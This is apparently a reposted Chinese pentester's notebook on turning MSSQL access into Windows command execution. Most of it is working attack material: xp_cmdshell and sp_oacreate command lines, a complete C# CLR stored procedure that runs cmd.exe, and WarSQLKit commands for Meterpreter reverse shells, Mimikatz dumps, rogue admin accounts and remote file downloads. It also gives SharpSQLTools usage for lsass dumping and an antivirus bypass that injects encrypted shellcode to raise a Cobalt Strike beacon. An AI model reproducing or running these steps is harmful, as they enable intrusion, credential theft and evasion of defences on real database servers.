Mssql记录
MSSQL Fileless Rootkit – MSSQL Attack Tool – WarSQLKit Eyüp Çelik // Sr. Cyber Security Expert (eyupcelik.com.tr)
Mssql数据库命令执行总结 - 先知社区 (aliyun.com)
渗透测试后期信息收集小结|后渗透阶段信息收集技巧 - 🔰雨苁ℒ🔰 (ddosi.org)
MSSQL使用CLR程序集来执行命令 - Y4er的博客
Pentest_Note/wiki/权限提升/Windows提权/MSSQL.md
【译】攻击SQL Server的CLR库 - 先知社区 (aliyun.com)
Attacking SQL Server CLR Assemblies (netspi.com)
【技术分享】攻击SQL Server CLR程序集-安全客 - 安全资讯平台 (anquanke.com)
记一次mssql注入
记录方面:参照Mssql数据库命令执行总结
•xp_cmdshell利用•COM组件利用•CLR利用•CLR bypass 360
xp_cmdshell利用
判断xp_cmdshell状态
在master.dbo.sysobjects中查看xp_cmdshell状态,xtype为对象类型,xtype='x'这里表示xp_cmdshell的对象类型为扩展存储过程。
select*from master.dbo.sysobjects where xtype='x'and name='xp_cmdshell'
select count(*)from master.dbo.sysobjects where xtype='x'and name='xp_cmdshell'
#存在即返回1
启用xp_cmdshell
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
关闭
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
执行命令
exec master..xp_cmdshell 'whoami'
exec master..xp_cmdshell 'ipconfig'
利用xplog70.dll恢复被删除的xp_cmdshell
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\xplog70.dll'
COM组件利用
借助Sql Server中的COM组件SP_OACREATE来执行系统命令。
判断SP_OACREATE状态
select*from master.dbo.sysobjects where xtype='x'and name='SP_OACREATE'
or
selectcount(*)from master.dbo.sysobjects where xtype='x'and name='SP_OACREATE'
#存在即返回1
启用SP_OACREATE
EXEC sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures',1;
RECONFIGURE WITH OVERRIDE;
通过SP_OACREATE执行系统命令指令
declare @shellintexec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c whoami >D:\Temp1.txt'
如果权限不够可以写到其他位置。比如其他盘符下面,此利用方法无回显,需要结合其他方式查看结果。
CLR利用
公共语言运行时 (CLR) 概述 - SQL Server | Microsoft Learn
从 SQL Server 2005 (9.x) 开始,SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。这意味着现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数。
编写CLR
利用VS创建MSSQL数据库项目,注意类名和命名空间的修改
usingSystem;
usingSystem.Data;
usingSystem.Data.SqlClient;
usingSystem.Data.SqlTypes;
usingSystem.Diagnostics;
usingSystem.Text;
usingMicrosoft.SqlServer.Server;
publicpartialclassStoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
publicstaticvoidExecCommand(string cmd)
{
// 在此处放置代码
SqlContext.Pipe.Send("Command is running, please wait.");
SqlContext.Pipe.Send(RunCommand("cmd.exe"," /c "+ cmd));
}
publicstaticstringRunCommand(string filename,string arguments)
{
var process =newProcess();
process.StartInfo.FileName= filename;
if(!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments= arguments;
}
process.StartInfo.CreateNoWindow=true;
process.StartInfo.WindowStyle=ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute=false;
process.StartInfo.RedirectStandardError=true;
process.StartInfo.RedirectStandardOutput=true;
var stdOutput =newStringBuilder();
process.OutputDataReceived+=(sender, args)=> stdOutput.AppendLine(args.Data);
string stdError =null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError = process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch(Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
if(process.ExitCode==0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
var message =newStringBuilder();
if(!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}
if(stdOutput.Length!=0)
{
message.AppendLine("Std output:");
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename + arguments +" finished with exit code = "+ process.ExitCode+": "+ message);
}
return stdOutput.ToString();
}
}
导入程序集
CLR功能MSSQL中是默认没有开启的,我们需要手动开启下
sp_configure 'clr enabled',1
GO
RECONFIGURE
GO
ALTER DATABASE master SET TRUSTWORTHY ON;
执行完之后我们的程序集就被导入了MSSQL中,此处是使用字节流的形式来执行的,你也可以直接导入dll文件来导入程序集。导入dll参考MSSQL使用CLR程序集来执行命令 - Y4er的博客
执行就行了。
创建存储过程 --- 这里name记得改一下,我的是Database1
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]
go
exec dbo.execcommand 'whoami'
完事儿,全程火绒alert,真刺激奥。回头看看CLR bypass
WarSQLKit
GitHub - mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit
直接下载,打开,7年前的老古董。
不错的火绒不错的拦截
麻了,加个白名单吧。
直接打开sln,build,完事儿
然后走导入程序集部分的流程
导入程序集
CREATE ASSEMBLY [WarSQLKit]
AUTHORIZATION [dbo]
FROM 0x4D-your-code-00;
GO
创建存储过程
CREATE PROCEDURE [dbo].[CmdExec]
@cmd NVARCHAR (MAX) NULL
AS EXTERNAL NAME [WarSQLKit].[StoredProcedures].[CmdExec]
GO
直接导入dll
之后创建存储过程
CREATE PROCEDURE sp_cmdExec
@Command[nvarchar](4000)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec
GO
使用
执行命令
EXEC sp_cmdExec 'whoami';
以NT AUTHORITYSYSTEM权限执行Windows命令
EXEC sp_cmdExec 'whoami /RunSystemPriv';
以NT AUTHORITYSYSTEM权限运行PowerShell命令
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS';
生成一个以NT AUTHORITYSYSTEM权限运行的X86 Meterpreter反向连接shell
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem';
生成一个以NT AUTHORITYSYSTEM权限运行的X64 Meterpreter反向连接shell
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem';
生成一个以NT AUTHORITYSYSTEM权限运行的X64 Meterpreter RC4反向连接shell
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'
RC4PASSWORD=warsql
生成一个以NT AUTHORITYSYSTEM权限运行的X86 meterpreter_bind_tcp shell
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem';
运行Mimikatz功能抓取密码
EXEC sp_cmdExec 'sp_Mimikatz';
获取Mimikatz日志
select*fromWarSQLKitTemp
文件下载
EXEC sp_cmdExec 'sp_downloadFile http://test.com/file.exe C:ProgramDatafile.exe 300';
获取MSSQL Hash
EXEC sp_cmdExec 'sp_getSqlHash';
获取Windows版本
EXEC sp_cmdExec 'sp_getProduct';
获取可用的数据库
EXEC sp_cmdExec 'sp_getDatabases';
https://github.com/evi1ox/MSSQL_BackDoor/tree/master/MSSQL-Fileless-Rootkit-WarSQLKit
EXEC sp_cmdExec 'whoami';=>AnyWindows command
EXEC sp_cmdExec 'whoami /RunSystemPriv';=>AnyWindows command with NT AUTHORITYSYSTEM rights
EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv';=>Adding users withRottenPotato(Kumpir)
EXEC sp_cmdExec '"net localgroup administrators eyup /add" /RunSystemPriv';=>Adding user to localgroup withRottenPotato(Kumpir)
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS';=>(Powershell)withRottenPotato(Kumpir)
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem';=> x86 MeterpreterReverseConnectionwith NT AUTHORITYSYSTEM
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem';=> x64 MeterpreterReverseConnectionwith NT AUTHORITYSYSTEM
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem';=> x86 MeterpreterReverseConnection RC4 with NT AUTHORITYSYSTEM, RC4PASSWORD=warsql
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem';=> x86 MeterpreterBindConnectionwith NT AUTHORITYSYSTEM
EXEC sp_cmdExec 'sp_Mimikatz';
select*fromWarSQLKitTemp=>GetMimikatzLog.ThnksBenjaminDelpy:)
EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:ProgramDatafile.exe 300';=>DownloadFile
EXEC sp_cmdExec 'sp_getSqlHash';=>Get MSSQL Hash
EXEC sp_cmdExec 'sp_getProduct';=>GetWindowsProduct
EXEC sp_cmdExec 'sp_getDatabases';=>GetAvailableDatabase
其他的一些操作,进而引出的工具使用。
使用工具
mssql提权之使用clr bypass360 - AD钙奶的博客 (ad-calcium.github.io)
MSSQL无落地文件执行Rootkit-WarSQLKit - 渗透测试中心 - 博客园 (cnblogs.com)
GitHub - uknowsec/SharpSQLTools: SharpSQLTools 和@Rcoil一起写的小工具,可上传下载文件,xp_cmdshell与sp_oacreate执行命令回显和clr加载程序集执行相应操作。
GitHub - evi1ox/MSSQL_BackDoor
奇安信攻防社区-mssql攻防探究 (butian.net)
找了一个参考文章,遂记录一下mssql提权之使用clr bypass360 - AD钙奶的博客 (ad-calcium.github.io)同时在同级目录进行了备份。相关进一步攻击原理参考Ana Sayfa - Eyüp Çelik // Sr. Cyber Security Expert (eyupcelik.com.tr)的文章
SharpSQLTools
下载编译好的,直接powershell执行就行了
~DesktopSharpSQLTools
❯.SharpSQLTools.exe -h
_____ _ _____ ____ _ _______ _
/ ____||/ ____|/ __ | ||__ __|||
|(___ ||__ __ _ _ __ _ __|(___ ||||||| ___ ___ ||___
___ | '_ / _` | '__|'_ \___ | | | | | | |/ _ / _ | / __|
____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | __
|_____/|_| |_|__,_|_| | .__/_____/ __________|_|___/ ___/|_|___/
| |
|_|
by Rcoil & Uknow
Usage:
SharpSQLTools target:port username password database - interactive console
SharpSQLTools target:port username password database module command - non-interactive console
Module:
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_oacreate {cmd} - executes cmd using sp_oacreate
enable_ole - you know what it means
disable_ole - you know what it means
upload {local} {remote} - upload a local file to a remote path (OLE required)
download {remote} {local} - download a remote file to a local path
enable_clr - you know what it means
disable_clr - you know what it means
install_clr - create assembly and procedure
uninstall_clr - drop clr
clr_pwd - print current directory by clr
clr_ls {directory} - list files by clr
clr_cd {directory} - change directory by clr
clr_ps - list process by clr
clr_netstat - netstat by clr
clr_ping {host} - ping by clr
clr_cat {file} - view file contents by clr
clr_rm {file} - delete file by clr
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:a.exe;clr_exec -p c:cmd.exe -a /c whoami
clr_efspotato {cmd} - exec by EfsPotato like clr_exec
clr_badpotato {cmd} - exec by BadPotato like clr_exec
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
clr_dumplsass {path} - dumplsass by clr
clr_rdp - check RDP port and Enable RDP
clr_getav - get anti-virus software on this machin by clr
clr_adduser {user} {pass} - add user by clr
clr_download {url} {path} - download file from url by clr
clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin)
clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt
clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader
exit
启动CLR 功能
使用文件16进制流创建CLR
使用CLR bypass360
192.168.10.105 C2 `lient
192.168.10.106 C2 sercer
192.168.10.1xx target
payload
SharpSQLTools
1-启用MSSQL CLR功能
SharpSQLTools.exe 192.168.10.107 sa 123456 master enable_clr
2-使用文件16进制流创建CLR
SharpSQLTools.exe 192.168.10.107 sa 123456 master install_clr
3-上传 payload.txt至可写目录
在执行copy命令合并文件时会被360拦截,但是文件已经被分割上传上去了。
SharpSQLTools.exe 192.168.10.107 sa 123456 master upload payload.txt C:UsersPublicpayload.txt
4-使用clr_combine去合并文件
SharpSQLTools.exe 192.168.10.107 sa 123456 master clr_combine C:UsersPublicpayload.txt
5-利用clr_scloader1加载进内存
SharpSQLTools中实现的clr_shellcode_loader使用APC注入技术,将shellcode解密后注入了一个新起的werFault.exe的进程中
loader是解密的key
SharpSQLTools.exe 192.168.10.107 sa 123456 master clr_scloader1 C:UsersPublicpayload.txt loader
结果记录:
合并文件
合并了之后完整的了
利用clr_scloader1加载进内存
SharpSQLTools.exe 192.168.10.107 sa 123456 master clr_scloader1 C:UsersPublicpayload.txt loader
beacon> shell whoami
[*]Tasked beacon to run: whoami
[+] host called home, sent:37 bytes
[-] could not spawn C:Windowssystem32cmd.exe /C whoami:5
执行拦截。
进程链bypass
注入其他进程来绕过sqlservr.exe的进程链防护。
至此搞定。
目标环境
原文始发于微信公众号(wulala520):Mssql记录-CLR+bypass
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论